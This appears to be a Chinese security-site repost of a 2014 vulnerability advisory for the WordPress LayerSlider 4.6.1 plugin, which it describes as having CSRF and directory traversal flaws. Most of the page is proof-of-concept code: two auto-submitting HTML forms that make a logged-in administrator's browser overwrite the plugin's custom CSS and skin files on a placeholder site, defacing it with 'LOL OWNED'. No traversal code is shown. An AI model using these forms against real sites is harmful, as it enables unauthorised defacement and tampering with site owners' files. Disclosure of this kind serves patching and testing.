WordPress LayerSlider 4.6.1 CSRF / Traversal--SecWiki 精品漏洞

WordPress LayerSlider 4.6.1 CSRF / Traversal
路人甲 2014-03-15 07:50:33

漏洞描述

			WordPress LayerSlider plugin version 4.6.1 suffers from cross site request forgery and directory traversal vulnerabilities.

测试代码

				CSRF

Defaced url can be found here: http://owned.tld/wp-content/uploads/layerslider.custom.css
============CSRF 1============================================

<body onload="javascript:document.forms[0].submit()">
<form action="http://owned.tld/wp-admin/admin.php?page=layerslider_style_editor&edited=1" method="post">
<input type="hidden" name="posted_ls_styles_editor" value="1">
<textarea rows="10" cols="50" name="contents" id="editor">LOL OWNED</textarea>
</form>
    
    
=========== CSRF 2=====================================================
Defaced URL can be found here:

http://owned.tld/wp-content/plugins/LayerSlider/skins/noskin/skin.css

======================================================
<body onload="javascript:document.forms[0].submit()">
<form action="http://owned.tld/wp-admin/admin.php?page=layerslider_skin_editor" method="post" class="inner">
<input type="hidden" name="posted_ls_skin_editor" value="1">
<textarea rows="10" cols="50" name="contents" id="editor">

LOL OWNED 
LOL OWNED 
LOL OWNED 
LOL OWNED 
LOL OWNED 
LOL OWNED 
LOL OWNED 
LOL OWNED 
LOL OWNED 
LOL OWNED 
LOL OWNED 
LOL OWNED 
LOL OWNED 
LOL OWNED 
LOL OWNED 
LOL OWNED 
LOL OWNED 
LOL OWNED 
LOL OWNED 
LOL OWNED 
LOL OWNED 
LOL OWNED 
LOL OWNED 
LOL OWNED 
LOL OWNED 


</textarea>

</form>
=====================================================

WordPress LayerSlider 4.6.1 CSRF / Traversal

漏洞描述

测试代码

最新公告

友情链接

SecWiki公众号

安全学术圈